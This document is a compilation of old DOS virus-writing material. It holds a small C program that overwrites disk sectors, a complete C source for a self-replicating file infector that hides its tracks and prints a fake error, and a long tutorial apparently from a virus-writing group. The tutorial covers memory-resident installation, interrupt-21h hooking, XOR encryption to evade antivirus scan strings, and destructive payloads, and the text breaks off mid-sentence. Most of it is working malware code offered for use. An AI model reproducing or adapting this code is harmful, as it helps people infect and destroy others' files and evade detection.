main()
{
char *vir;
int i;

strcpy(vir,”");
for (i=0; i<40; i++)
strcat(vir,”HOWS IT DOING ROYAL UGLY DUDES!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!”);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
abswrite(5,50,0,vir);
printf(“Ouch dude… sorry..”);
};

#pragma inline

#define   CRLF       “\x17\x14″          /*  CR/LF combo encrypted.  */
#define   NO_MATCH   0×12                /*  No match in wildcard search.  */

/*  The following strings are not garbled; they are all encrypted  */
/*  using the simple technique of adding the integer value 10 to   */
/*  each character.  They are automatically decrypted by           */
/*  ‘print_s()’, the function which sends the strings to ‘stdout’  */
/*  using DOS service 09H.  All are terminated with a dollar-sign  */
/*  “$” as per DOS service specifications.                         */

char fake_msg[] = CRLF “Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.”;
char *virus_msg[3] =
{
CRLF “\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.”,
CRLF “\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.”,
CRLF “\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14.”
};

struct _dta                     /*  Disk Transfer Area format for find.  */
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0×80;   /*  Set it to default DTA.  */

const char filler[] = “XX”;             /*  Pad file length to 666 bytes.  */
const char *codestart = (char *) 0×100;  /*  Memory where virus code begins.  */
const int virus_size = 666;      /*  The size in bytes of the virus code.  */
const int infection_rate = 4;     /*  How many files to infect per run.  */

char compare_buf[20];           /*  Load program here to test infection.  */
int handle;                     /*  The current file handle being used.  */
int datestamp, timestamp;       /*  Store original date and time here.  */
char diseased_count = 0;        /*  How many infected files found so far.  */
char success = 0;               /*  How many infected this run.  */

/*  The following are function prototypes, in keeping with ANSI    */
/*  Standard C, for the support functions of this program.         */

int find_first( char *fn );
int find_healthy( void );
int find_next( void );
int healthy( void );
void infect( void );
void close_handle( void );
void open_handle( char *fn );
void print_s( char *s );
void restore_timestamp( void );

/*———————————-*/
/*     M A I N    P R O G R A M     */
/*———————————-*/

int main( void )  {
int x = 0;
do {
if ( find_healthy() )  {           /*  Is there an un-infected file?  */
infect();                        /*  Well, then infect it!  */
x++;                             /*  Add one to the counter.  */
success++;                       /*  Carve a notch in our belt.  */
}
else  {                            /*  If there ain’t a file here… */
_DX = (int) “..”;                /*  See if we can step back to  */
_AH = 0x3b;                      /*  the parent directory, and try  */
asm   int 21H;                   /*  there.  */
x++;                             /*  Increment the counter anyway, to  */
}                                  /*  avoid infinite loops.  */
} while( x < infection_rate );       /*  Do this until we’ve had enough.  */
if ( success )                       /*  If we got something this time,  */
print_s( fake_msg );               /*  feed ‘em the phony error line.  */
else
if ( diseased_count > 6 )          /*  If we found 6+ infected files  */
for( x = 0; x < 3; x++ )         /*  along the way, laugh!!  */
print_s( virus_msg[x] );
else
print_s( fake_msg );             /*  Otherwise, keep a low profile.  */
return;
}

void infect( void )  {
_DX = (int) dta->filename;  /*  DX register points to filename.  */
_CX = 0×00;                 /*  No attribute flags are set.  */
_AL = 0×01;                 /*  Use Set Attribute sub-function.  */
_AH = 0×43;                 /*  Assure access to write file.  */
asm   int 21H;              /*  Call DOS interrupt.  */
open_handle( dta->filename );        /*  Re-open the healthy file.  */
_BX = handle;                       /*  BX register holds handle.  */
_CX = virus_size;                   /*  Number of bytes to write.  */
_DX = (int) codestart;              /*  Write program code.  */
_AH = 0×40;                         /*  Set up and call DOS.  */
asm   int 21H;
restore_timestamp();               /*  Keep original date & time.  */
close_handle();                     /*  Close file.  */
return;
}

int find_healthy( void )  {
if ( find_first(“*.EXE”) != NO_MATCH )       /*  Find EXE?  */
if ( healthy() )                         /*  If it’s healthy, OK!  */
return 1;
else
while ( find_next() != NO_MATCH )      /*  Try a few more otherwise. */
if ( healthy() )
return 1;                          /*  If you find one, great!  */
if ( find_first(“*.COM”) != NO_MATCH )       /*  Find COM?  */
if ( healthy() )                         /*  If it’s healthy, OK!  */
return 1;
else
while ( find_next() != NO_MATCH )      /*  Try a few more otherwise. */
if ( healthy() )
return 1;                          /*  If you find one, great!  */
return 0;                                  /*  Otherwise, say so.  */
}

int healthy( void )  {
int i;
datestamp = dta->datestamp;        /*  Save time & date for later.  */
timestamp = dta->timestamp;
open_handle( dta->filename );      /*  Open last file located.  */
_BX = handle;                      /*  BX holds current file handle.  */
_CX = 20;                          /*  We only want a few bytes.  */
_DX = (int) compare_buf;          /*  DX points to the scratch buffer.  */
_AH = 0x3f;                       /*  Read in file for comparison.  */
asm   int 21H;
restore_timestamp();              /*  Keep original date & time.  */
close_handle();                   /*  Close the file.  */
for ( i = 0; i < 20; i++ )        /*  Compare to virus code.  */
if ( compare_buf[i] != *(codestart+i) )
return 1;                     /*  If no match, return healthy.  */
diseased_count++;                 /*  Chalk up one more fucked file.  */
return 0;                         /*  Otherwise, return infected.  */
}

void restore_timestamp( void )  {
_AL = 0×01;                         /*  Keep original date & time.  */
_BX = handle;                       /*  Same file handle.  */
_CX = timestamp;                    /*  Get time & date from DTA.  */
_DX = datestamp;
_AH = 0×57;                         /*  Do DOS service.  */
asm   int 21H;
return;
}

void print_s( char *s )  {
char *p = s;
while ( *p )  {              /*  Subtract 10 from every character.  */
*p -= 10;
p++;
}
_DX = (int) s;              /*  Set DX to point to adjusted string.   */
_AH = 0×09;                 /*  Set DOS function number.  */
asm   int 21H;              /*  Call DOS interrupt.  */
return;
}

int find_first( char *fn )  {
_DX = (int) fn;             /*  Point DX to the file name.  */
_CX = 0xff;                 /*  Search for all attributes.  */
_AH = 0x4e;                 /*  ‘Find first’ DOS service.  */
asm   int 21H;              /*  Go, DOS, go.  */
return _AX;                 /*  Return possible error code.  */
}

int find_next( void )  {
_AH = 0x4f;                 /*  ‘Find next’ function.  */
asm   int 21H;              /*  Call DOS.  */
return _AX;                 /*  Return any error code.  */
}

void open_handle( char *fn )  {
_DX = (int) fn;             /*  Point DX to the filename.  */
_AL = 0×02;                 /*  Always open for both read & write. */
_AH = 0x3d;                 /*  “Open handle” service.  */
asm   int 21H;              /*  Call DOS.  */
handle = _AX;               /*  Assume handle returned OK.  */
return;
}

void close_handle( void )  {
_BX = handle;               /*  Load BX register w/current file handle.  */
_AH = 0x3e;                 /*  Set up and call DOS service.  */
asm   int 21H;
return;
}

STRUCTURE

In case  you missed  it the last time, here is a quick, general overview of
the structure  of the  resident virus.   The  virus consists  of two  major
portions, the  loading stub  and the  interrupt handlers.  The loading stub
performs two  functions.  First, it redirects interrupts to the virus code.
Second, it causes the virus to go resident.  The interrupt handlers contain
the code  which  cause  file  infection.    Generally,  the  handlers  trap
interrupt 21h and intercept such calls as file execution.

LOADING STUB

The loading  stub consists of two major portions, the residency routine and
the restoration  routine.   The latter portion, which handles the return of
control to  the original  file, is  identical as the one in the nonresident
virus.  I will briefly touch upon it here.

By now  you  should  understand  thoroughly  the  theory  behind  COM  file
infection.   By simply  replacing the  first few  bytes,  transfer  can  be
controlled to  the virus.   The  trick in  restoring COM files is simply to
restore the  overwritten  bytes  at  the  beginning  of  the  file.    This
restoration takes place only in memory and is therefore far from permanent.
Since COM files always load in a single memory segment and begin loading at
offset 100h  in the  memory  segment  (to  make  room  for  the  PSP),  the
restoration procedure  is very  simple.   For example,  if the  first three
bytes of  a COM  file were  stored in a buffer called “first3″ before being
overwritten by the virus, then the following code would restore the code in
memory:

mov  di,100h          ; Absolute location of destination
lea  si,[bp+first3]   ; Load address of saved bytes.
; Assume bp = “delta offset”
movsw                 ; Assume CS = DS = ES and a cleared direction flag
movsb                 ; Move three bytes

The problem of returning control to the program still remains.  This simply
consists of  forcing the  program to  transfer control to offset 100h.  The
easiest routine follows:

mov  di,100h
jmp  di

There are  numerous variations of this routine, but they all accomplish the
basic task of setting the ip to 100h.

You should  also understand  the concept  behind EXE infection by now.  EXE
infection, at  its most  basic level, consists of changing certain bytes in
the EXE  header.   The trick  is simply  to undo  all the changes which the
virus made.  The code follows:

mov     ax, es                          ; ES = segment of PSP
add     ax, 10h                         ; Loading starts after PSP
add     word ptr cs:[bp+OrigCSIP+2], ax ; Header segment value was
; relative to end of PSP
cli
add     ax, word ptr cs:[bp+OrigSSSP+2] ; Adjust the stack as well
mov     ss, ax
mov     sp, word ptr cs:[bp+OrigSSSP]
sti
db      0eah                            ; JMP FAR PTR SEG:OFF
OrigCSIP  dd ?                            ; Put values from the header
OrigSSSP  dd ?                            ; into here

If the  virus is  an EXE-specific  infector but you still wish to use a COM
file as  the carrier file, then simply set the OrigCSIP value to FFF0:0000.
This will  be changed  by the  restoration routine  to PSP:0000  which  is,
conveniently, an int 20h instruction.

All that  stuff should  not be  new.   Now we shall tread on new territory.
There are  two methods  of residency.  The first is the weenie method which
simply consists of using DOS interrupts to do the job for you.  This method
sucks because  it is  1) easily  trappable by  even the  most primitive  of
resident virus  monitors and  2) forces the program to terminate execution,
thereby alerting  the user  to the  presence of the virus.  I will not even
present code  for the  weenie method  because, as  the name suggests, it is
only for  weenies.   Real programmers  write their  own residency routines.
This basically consists of MCB-manipulation.  The general method is:

1.   Check for prior installation.  If already installed, exit the virus.
2.   Find the top of memory.
3.   Allocate the high memory.
4.   Copy the virus to high memory.
5.   Swap the interrupt vectors.

There are  several variations  on this technique and they will be discussed
as the need arises.

INSTALLATION CHECK

There are  several different  types of installation check.  The most common
is a  call to int 21h with AX set to a certain value.  If certain registers
are returned  set to  certain values,  then the  virus is  resident.    For
example, a sample residency check would be:

mov  ax,9999h  ; residency check
int  21h
cmp  bx,9999h  ; returns bx=9999h if installed
jz   already_installed

When choosing  a value  for ax in the installation check, make sure it does
not conflict  with an  existing function  unless the  function is harmless.
For example,  do not  use display  string (ah=9)  unless you  wish to  have
unpredictable results  when the virus is first being installed.  An example
of a harmless function is get DOS version (ah=30h) or flush keyboard buffer
(ah=0bh).   Of course, if the check conflicts with a current function, make
sure it  is narrow  enough so no programs will have a problem with it.  For
example, do  not merely trap ah=30h, but trap ax=3030h or even ax=3030h and
bx=3030h.

Another  method  of  checking  for  residency  is  to  search  for  certain
characteristics of  the virus.   For  example, if  the virus always sets an
unused interrupt  vector to  point to  its code, a possible residency check
would be to search the vector for the virus characteristics.  For example:

xor  ax,ax
mov  ds,ax     ; ds->interrupt table
les  bx,ds:[60h*4] ; get address of interrupt 60h
; assume the virus traps this and puts its int 21h handler
; here
cmp  es:bx,0FF2Eh ; search for the virus string
.
.
.
int60:
jmp far ptr cs:origint21

When using this method, take care to ensure that there is no possibility of
this characteristic  being false when the virus is resident.  In this case,
another program must not trap the int 60h vector or else the check may fail
even if  the virus  is  already  resident,  thereby  causing  unpredictable
results.

FIND THE TOP OF MEMORY

DOS generally  loads all available memory to a program upon loading.  Armed
with this  knowledge, the  virus can  easily determine the available memory
size.  Once again, the MCB structure is:

Offset    Size Meaning
—— ——- ——-
0         BYTE ‘M’ or ‘Z’
1         WORD Process ID (PSP of block’s owner)
3         WORD Size in paragraphs
5      3 BYTES Reserved (Unused)
8      8 BYTES DOS 4+ uses this.  Yay.

mov  ax,ds     ; Assume DS initially equals the segment of the PSP
dec  ax
mov  ds,ax     ; DS = MCB of infected program
mov  bx,ds:[3] ; Get MCB size (total available paragraphs to program)

A simpler  method of  performing the same action is to use DOS’s reallocate
memory function in the following manner:

mov  ah,4ah    ; Alter memory allocation (assume ES = PSP)
mov  bx,0FFFFh ; Request a ridiculous amount of memory
int  21h       ; Returns maximum available memory in BX
; This is the same value as in ds:[3]

ALLOCATE THE HIGH MEMORY

The easiest method to allocate memory is to let DOS do the work for you.

mov  ah,4ah    ; Alter memory allocation (assume ES = PSP)
sub  bx,(endvirus-startvirus+15)/16+1 ; Assume BX originally held total
; memory available to the program (returned by earlier
; call to int 21h/function 4ah
int  21h

mov  ah,48h    ; Allocate memory
mov  bx,(endvirus-startvirus+15)/16
int  21h
mov  es,ax     ; es now holds the high memory segment

dec  bx
mov  byte ptr ds:[0], ‘Z’ ; probably not needed
mov  word ptr ds:[1], 8   ; Mark DOS as owner of MCB

The purpose  of marking  DOS as  the owner  of the  MCB is  to prevent  the
deallocation of the memory area upon termination of the carrier program.

Of course, some may prefer direct manipulation of the MCBs.  This is easily
accomplished.   If ds is equal to the segment of the carrier program’s MCB,
then the following code will do the trick:

; Step 1) Shrink the carrier program’s memory allocation
; One paragraph is added for the MCB of the memory area which the virus
; will inhabit
sub  ds:[3],(endvirus-startvirus+15)/16 + 1

; Step 2) Mark the carrier program’s MCB as the last in the chain
; This isn’t really necessary, but it assures that the virus will not
; corrupt the memory chains
mov  byte ptr ds:[0],’Z’

; Step 3) Alter the program’s top of memory field in the PSP
; This preserves compatibility with COMMAND.COM and any other program
; which uses the field to determine the top of memory
sub  word ptr ds:[12h],(endvirus-startvirus+15)/16 + 1

; Step 4) Calculate the first usable segment
mov  bx,ds:[3] ; Get MCB size
stc            ; Add one for the MCB segment
adc  bx,ax     ; Assume AX still equals the MCB of the carrier file
; BX now holds first usable segment.  Build the MCB
; there
; Alternatively, you can use the value in ds:[12h] as the first usable
; segment:
; mov  bx,ds:[12h]

; Step 5) Build the MCB
mov  ds,bx     ; ds holds the area to build the MCB
inc  bx        ; es now holds the segment of the memory area controlled
mov  es,bx     ; by the MCB
mov  byte ptr ds:[0],’Z’ ; Mark the MCB as the last in the chain
; Note: you can have more than one MCB chain
mov  word ptr ds:[1],8   ; Mark DOS as the owner
mov  word ptr ds:[3],(endvirus-startvirus+15)/16 ; FIll in size field

There is yet another method involving direct manipulation.

; Step 1) Shrink the carrier program’s memory allocation
; Note that rounding is to the nearest 1024 bytes and there is no
; addition for an MCB
sub  ds:[3],((endvirus-startvirus+1023)/1024)*64

; Step 2) Mark the carrier program’s MCB as the last in the chain
mov  byte ptr ds:[1],’Z’

; Step 3) Alter the program’s top of memory field in the PSP
sub  word ptr ds:[12h],((endvirus-startvirus+1023)/1024)*64

; Step 4) Calculate the first usable segment
mov  es,word ptr ds:[12h]

; Step 5) Shrink the total memory as held in BIOS
; Memory location 0:413h holds the total system memory in K
xor  ax,ax
mov  ds,ax
sub  ds:[413h],(endvirus-startvirus+1023)/1024 ; shrink memory size

This method  is great  because it  is simple and short.  No MCB needs to be
created because  DOS will no longer allocate memory held by the virus.  The
modification of the field in the BIOS memory area guarantees this.

COPY THE VIRUS TO HIGH MEMORY

This is  ridiculously easy  to do.  If ES holds the high memory segment, DS
holds CS, and BP holds the delta offset, then the following code will do:

lea  si,[bp+offset startvirus]
xor  di,di     ; destination @ 0
mov  cx,(endvirus-startvirus)/2
rep  movsw     ; Copy away, use words for speed

SWAP INTERRUPT VECTORS

There are,  once again,  two ways  to do this; via DOS or directly.  Almost
every programmer  worth his  salt has  played with interrupt vectors at one
time or another.  Via DOS:

push es        ; es->high memory
pop  ds        ; ds->high memory
mov  ax,3521h  ; get old int 21h handler
int  21h       ; to es:bx
mov  word ptr ds:oldint21,bx  ; save it
mov  word ptr ds:oldint21+2,es
mov  dx,offset int21 ; ds:dx->new int 21h handler in virus
mov  ax,2521h  ; set handler
int  21h

And direct manipulation:
xor  ax,ax
mov  ds,ax
lds  bx,ds:[21h*4]
mov  word ptr es:oldint21,bx
mov  word ptr es:oldint21+2,ds
mov  ds,ax
mov  ds:[21h*4],offset int21
mov  ds:[21h*4+2],es

Delta offset  calculations  are  not  needed  since  the  location  of  the
variables is  known.   This is because the virus is always loaded into high
memory starting in offset 0.

INTERRUPT HANDLER

The interrupt  handler intercepts  function calls  to DOS and waylays them.
The interrupt  handler typically  begins with  a check  for a  call to  the
installation check.  For example:

int21:
cmp  ax,9999h  ; installation check?
jnz  not_installation_check
xchg ax,bx     ; return bx = 9999h if installed
iret           ; exit interrupt handler
not_installation_check:
; rest of interrupt handler goes here

With this  out of  the way,  the virus  can trap whichever DOS functions it
wishes.    Generally  the  most  effective  function  to  trap  is  execute
(ax=4b00h), as  the most commonly executed files will be infected.  Another
function to  trap, albeit  requiring more work, is handle close.  This will
infect  on   copies,  viewings,  patchings,  etc.    With  some  functions,
prechaining is  desired; others,  postchaining.   Use common sense.  If the
function destroys  the filename  pointer, then  use prechaining.    If  the
function   needs   to  be   completed  before  infection  can  take  place,
postchaining should be used.  Prechaining is simple:

pushf           ; simulate an int 21h call
call dword ptr cs:oldint21

; The following code ensures that the flags will be properly set upon
; return to the caller
pushf
push bp
push ax

; flags         [bp+10]
; calling CS:IP [bp+6]
; flags new     [bp+4]
; bp            [bp+2]
; ax            [bp]

mov  bp, sp     ; setup stack frame
mov  ax, [bp+4] ; get new flags
mov  [bp+10], ax; replace the old with the new

pop  ax         ; restore stack
pop  bp
popf

To exit  the interrupt  handler after  prechaining, use  an iret  statement
rather than a retn or retf.  Postchaining is even simpler:

jmp  dword ptr cs:oldint21 ; this never returns to the virus int handler

When leaving  the interrupt  handler, make  sure  that  the  stack  is  not
unbalanced and  that the  registers were  not altered.   Save the registers
right after prechaining and long before postchaining.

Infection in  a resident  virus is  essentially  the  same  as  that  in  a
nonresident virus.   The  only difference occurs when the interrupt handler
traps one  of the functions used in the infection routine.  For example, if
handle close is trapped, then the infection routine must replace the handle
close int 21h call with a call to the original interrupt 21h handler, a la:

pushf
call dword ptr cs:oldint21

It is also necessary to handle encryption in another manner with a resident
virus.  In the nonresident virus, it was not necessary to preserve the code
at all  times.   However, it  is desirable to keep the interrupt handler(s)
decrypted, even  when infecting.   Therefore,  the virus  should  keep  two
copies of  itself in  memory, one  as code  and one as data.  The encryptor
should encrypt  the secondary  copy  of  the  virus,  thereby  leaving  the
interrupt handler(s)  alone.   This is  especially important  if the  virus
traps other interrupts such as int 9h or int 13h.

A THEORY ON RESIDENT VIRUSES

Resident viruses  can typically  be divided  into two  categories; slow and
fast infectors.  They each have their own advantages and disadvantages.

Slow infectors  do not  infect except in the case of a file creation.  This
infector traps file creates and infects upon the closing of the file.  This
type of  virus infects  on new  file creations  and copying  of files.  The
disadvantage is  that the  virus spreads slowly.  This disadvantage is also
an advantage,  as this  may keep  it undetected  for a long time.  Although
slow infectors sound ineffective, in reality they can work well.  Infection
on file  creations means that checksum/CRC virus detectors won’t be able to
checksum/CRC the  file until  after it  has been  infected.   Additionally,
files are  often copied  from one  directory to  another after testing.  So
this method can work.

Fast infectors  infect on  executes.   This type  of virus will immediately
attack commonly  used files,  ensuring the continual residency of the virus
in subsequent  boots.   This is  the primary  advantage, but it is also the
primary disadvantage.   The  infector works  so rapidly  that the  user may
quickly detect  a discrepancy with the system, especially if the virus does
not utilise any stealth techniques.

Of course,  there is  no  “better”  way.    It  is  a  matter  of  personal
preference.   The vast  majority  of  viruses  today  are  fast  infectors,
although slow infectors are beginning to appear with greater frequency.

If the  virus is  to infect  on a  create or  open, it  first must copy the
filename to  a buffer,  execute the  call, and  save the handle.  The virus
must then  wait for  a handle close corresponding to that handle and infect
using the  filename stored  in the  buffer.  This is the simplest method of
infecting after a handle close without delving into DOS internals.

IF YOU DON’T UNDERSTAND IT YET

don’t despair;  it will  come after  some time and much practise.  You will
soon find  that resident  viruses  are  easier  to  code  than  nonresident
viruses.   That’s all  for this  installment, but  be sure to grab the next
one.

The concealer  is the  most common  defense  virus  writers  use  to  avoid
detection of  virii.   The most common encryption/decryption routine by far
is the XOR, since it may be used for both encryption and decryption.

encrypt_val   dw   ?   ; Should be somewhere in decrypted area

decrypt:
encrypt:
mov dx, word ptr [bp+encrypt_val]
mov cx, (part_to_encrypt_end – part_to_encrypt_start + 1) / 2
lea si, [bp+part_to_encrypt_start]
mov di, si

xor_loop:
lodsw
xor ax, dx
stosw
loop xor_loop

The previous  routine uses  a simple XOR routine to encrypt or decrypt code
in memory.   This  is essentially  the same routine as the one in the first
installment, except  it encrypts words rather than bytes.  It therefore has
65,535 mutations  as opposed  to 255 and is also twice as fast.  While this
routine is  simple to  understand, it  leaves much  to be  desired as it is
large and therefore is almost begging to be a scan string.  A better method
follows:

encrypt_val   dw    ?

decrypt:
encrypt:
mov dx, word ptr [bp+encrypt_val]
lea bx, [bp+part_to_encrypt_start]
mov cx, (part_to_encrypt_end – part_to_encrypt_start + 1) / 2

xor_loop:
xor word ptr [bx], dx
add bx, 2
loop xor_loop

Although this  code is  much shorter,  it is possible to further reduce its
size.   The best  method is  to insert the values for the encryption value,
BX, and CX, in at infection-time.

decrypt:
encrypt:
mov bx, 0FFFFh
mov cx, 0FFFFh

xor_loop:
xor word ptr [bx], 0FFFFh
add bx, 2
loop xor_loop

All the  values denoted  by 0FFFFh  may be changed upon infection to values
appropriate for  the infected  file.  For example, BX should be loaded with
the offset  of part_to_encrypt_start  relative to the start of the infected
file when the encryption routine is written to the infected file.

The primary  advantage of  the code  used above is the minimisation of scan
code length.   The scan code can only consist of those portions of the code
which remain  constant.   In this  case,  there  are  only  three  or  four
consecutive bytes  which remain  constant.   Since  the  entire  encryption
consist of only about a dozen bytes, the size of the scan code is extremely
tiny.

Although the  function of  the encryption  routine is  clear,  perhaps  the
initial encryption  value and  calculation of  subsequent values  is not as
lucid.  The initial value for most XOR encryptions should be 0.  You should
change the  encryption value  during  the  infection  process.    A  random
encryption value  is desired.   The  simplest method  of obtaining a random
number is  to consult  to internal  clock.   A random  number may be easily
obtained with a simple:

mov     ah, 2Ch                         ; Get me a random number.
int     21h
mov     word ptr [bp+encrypt_val], dx   ; Can also use CX

Some encryption  functions do not facilitate an initial value of 0.  For an
example, take  a look  at Whale.  It uses the value of the previous word as
an encryption  value.   In these  cases, simply  use a JMP to skip past the
decryption routine  when coding  the virus.   However, make sure infections
JMP to  the right location!  For example, this is how you would code such a
virus:

org     100h

start:
jmp     past_encryption

; Insert your encryption routine here

past_encryption:

The encryption  routine is  the ONLY  part of  the virus  which needs to be
unencrypted.   Through code-moving  techniques, it  is possible to copy the
infection mechanism  to the  heap (memory location past the end of the file
and before  the stack).   All  that is required is a few MOVSW instructions
and one  JMP.   First the  encryption routine  must  be  copied,  then  the
writing, then  the decryption,  then the  RETurn back  to the program.  For
example:

lea si, [bp+encryption_routine]
lea di, [bp+heap]
mov cx, encryption_routine_size
push si
push cx
rep movsb

lea si, [bp+writing_routine]
mov cx, writing_routine_size
rep movsb

pop cx
pop si
rep movsb

mov al, 0C3h                             ; Tack on a near return
stosb

call [bp+heap]

Although most  virii, for  simplicity’s sake, use the same routine for both
encryption  and  decryption,  the  above  code  shows  this  is  completely
unnecessary.   The only  modification of  the above code for inclusion of a
separate decryption  routine is to take out the PUSHes and replace the POPs
with the appropriate LEA si and MOV cx.

Original encryption  routines, while  interesting, might  not be  the best.
Stolen encryption  routines are  the best,  especially  those  stolen  from
encrypted shareware  programs!   Sydex is notorious for using encryption in
their shareware  programs.   Take a  look at  a  shareware  program’s  puny
encryption and  feel free  to copy  it into your own.  Hopefully, the anti-
viral developers  will create  a scan string which will detect infection by
your virus in shareware products simply because the encryption is the same.

Note that  this is  not a  full treatment  of concealment routines.  A full
text file could be written on encryption/decryption techniques alone.  This
is only  the simplest  of all  possible encryption techniques and there are
far more  concealment techniques  available.  However, for the beginner, it
should suffice.

THE DISPATCHER

The dispatcher  is the  portion of the virus which restores control back to
the infected  program.    The  dispatchers  for  EXE  and  COM  files  are,
naturally, different.

In COM  files, you  must restore  the bytes  which were overwritten by your
virus and  then transfer  control back  to CS:100h,  which is where all COM
files are initially loaded.

RestoreCOM:
mov di, 100h                     ; We are copying to the beginning
lea si, [bp+savebuffer]          ; We are copying from our buffer
push di                          ; Save offset for return (100h)
movsw                            ; Mo efficient than mov cx, 3, movsb
movsb                            ; Alter to meet your needs
retn                             ; A JMP will also work

EXE files  require simply  the restoration of the stack segment/pointer and
the code segment/instruction pointer.

ExeReturn:
mov     ax, es                           ; Start at PSP segment
add     ax, 10h                          ; Skip the PSP
add     word ptr cs:[bp+ExeWhereToJump+2], ax
cli
add     ax, word ptr cs:[bp+StackSave+2] ; Restore the stack
mov     ss, ax
mov     sp, word ptr cs:[bp+StackSave]
sti
db      0eah                             ; JMP FAR PTR SEG:OFF
ExeWhereToJump:
dd      0
StackSave:
dd      0

ExeWhereToJump2 dd 0
StackSave2      dd 0

Upon  infection,   the  initial   CS:IP  and  SS:SP  should  be  stored  in
ExeWhereToJump2 and StackSave2, respectively.  They should then be moved to
ExeWhereToJump and  StackSave before  restoration of  the  program.    This
restoration may be easily accomplished with a series of MOVSW instructions.

Some like  to clear all the registers prior to the JMP/RET, i.e. they issue
a bunch  of XOR  instructions.   If you  feel happy  and wish to waste code
space, you are welcome to do this, but it is unnecessary in most instances.

THE BOMB

“The horror!  The horror!”
- Joseph Conrad, The Heart of Darkness

What goes through the mind of a lowly computer user when a virus activates?
What terrors  does the unsuspecting victim undergo as the computer suddenly
plays a  Nazi tune?  How awful it must be to lose thousands of man-hours of
work in an instant!

Actually, I  do not  support wanton destruction of data and disks by virii.
It serves  no purpose  and usually  shows little imagination.  For example,
the world-famous Michelangelo virus did nothing more than overwrite sectors
of the  drive with  data taken at random from memory.  How original.  Yawn.
Of course,  if you  are hell-bent  on destruction, go ahead and destroy all
you want,  but just  remember that this portion of the virus is usually the
only part  seen by  “end-users” and distinguishes it from others.  The best
examples to date include: Ambulance Car, Cascade, Ping Pong, and Zero Hunt.
Don’t forget the PHALCON/SKISM line, especially those by me (I had to throw
in a plug for the group)!

As you  can see,  there’s no  code to  speak of in this section.  Since all
bombs should be original, there isn’t much point of putting in the code for
one, now  is there!   Of course, some virii don’t contain any bomb to speak
of.   Generally speaking,  only those  under about  500 bytes  lack  bombs.
There is no advantage of not having a bomb other than size considerations.

MEA CULPA

I regret  to inform  you that  the  EXE  infector  presented  in  the  last
installment was  not quite  perfect.   I admit  it.   I made  a mistake  of
colossal proportions   The  calculation of  the file size and file size mod
512 was screwed up.  Here is the corrected version:

; On entry, DX:AX hold the NEW file size

push    ax                          ; Save low word of filesize
mov     cl, 9                       ; 2^9 = 512
shr     ax, cl                      ; / 512
ror     dx, cl                      ; / 512 (sort of)
stc                                 ; Check EXE header description
; for explanation of addition
adc     dx, ax                      ; of 1 to the DIV 512 portion
pop     ax                          ; Restore low word of filesize
and     ah, 1                       ; MOD 512

This results  in the file size / 512 + 1 in DX and the file size modulo 512
in AX.   The  rest remains  the same.  Test your EXE infection routine with
Microsoft’s LINK.EXE,  since it  won’t run  unless  the  EXE  infection  is
perfect.

I have  saved you  the trouble  and smacked myself upside the head for this
dumb error.

TIPS AND TRICKS

So now  all the  parts of  the nonresident  virus have been covered.  Yet I
find myself  left with several more K to fill.  So, I shall present several
simple techniques anyone can incorporate into virii to improve efficiency.

1.   Use the heap
The heap  is the memory area between the end of code and the bottom of
the stack.   It can be conveniently treated as a data area by a virus.
By moving  variables to the heap, the virus need not keep variables in
its code,  thereby reducing  its length.  Note that since the contents
heap are  not part  of the  virus, only  temporary variables should be
kept there,  i.e. the  infection routine  should not count the heap as
part of  the virus as that would defeat the entire purpose of its use.
There are two ways of using the heap:

; First method

EndOfVirus:
Variable1 equ $
Variable2 equ Variable1 + LengthOfVariable1
Variable3 equ Variable2 + LengthOfVariable2
Variable4 equ Variable3 + LengthOfVariable3

; Example of first method

EndOfVirus:
StartingDirectory = $
TemporaryDTA      = StartingDirectory + 64
FileSize          = TemporaryDTA + 42
Flag              = FileSize + 4

; Second method

EndOfVirus:
Variable1 db LengthOfVariable1 dup (?)
Variable2 db LengthOfVariable2 dup (?)
Variable3 db LengthOfVariable3 dup (?)
Variable4 db LengthOfVariable4 dup (?)

; Example of second method
EndOfVirus:
StartingDirectory db 64 dup (?)
TemporaryDTA      db 42 dup (?)
FileSize          dd ?
Flag              db ?

The two  methods differ  slightly.   By using  the first  method,  you
create a  file which  will be  the exact  length of  the  virus  (plus
startup  code).     However,  when  referencing  the  variables,  size
specifications such as BYTE PTR, WORD PTR, DWORD PTR, etc. must always
be used  or the  assembler will  become befuddled.   Secondly,  if the
variables need  to be  rearranged for some reason, the entire chain of
EQUates will  be destroyed  and must  be rebuilt.   Virii  coded  with
second method  do not need size specifications, but the resulting file
will be  larger than  the actual size of the virus.  While this is not
normally a  problem, depending on the reinfection check, the virus may
infect the  original file  when run.   This  is not  a big disability,
especially considering the advantages of this method.

In any  case, the  use of  the heap  can greatly  lessen the effective
length of the virus code and thereby make it much more efficient.  The
only thing  to watch  out for  is infecting  large COM files where the
heap will  “wrap around”  to offset  0 of the same segment, corrupting
the PSP.   However,  this problem is easily avoided.  When considering
whether a  COM file is too large to infect for this reason, simply add
the temporary variable area size to the virus size for the purposes of
the check.

2.   Use procedures
Procedures are  helpful in  reducing the  size of  the virus, which is
always a  desired goal.   Only  use procedures if they save space.  To
determine the amount of bytes saved by the use of a procedure, use the
following formula:

Let PS = the procedure size, in bytes
bytes saved = (PS – 4) * number invocations – PS

For example, the close file procedure,

close_file:
mov ah, 3eh      ; 2 bytes
int 21h          ; 2 bytes
ret              ; 1 byte
; PS = 2+2+1 = 5

is only  viable if  it is used 6 or more times, as (5-4)*6 – 5 = 1.  A
whopping savings of one (1) byte!  Since no virus closes a file in six
different places,  the close  file procedure  is clearly  useless  and
should be avoided.

Whenever  possible,  design  the  procedures  to  be  as  flexible  as
possible.   This is the chief reason why Bulgarian coding is so tight.
Just take  a look  at the source for Creeping Death.  For example, the
move file pointer procedure:

go_eof:
mov al, 2
move_fp:
xor dx, dx
go_somewhere:
xor cx, cx
mov ah, 42h
int 21h
ret

The function  was build  with flexibility  in mind.   With  a CALL  to
go_eof, the  procedure will  move the  file pointer  to the end of the
file.   A CALL  to move_fp  with AL set to 0, the file pointer will be
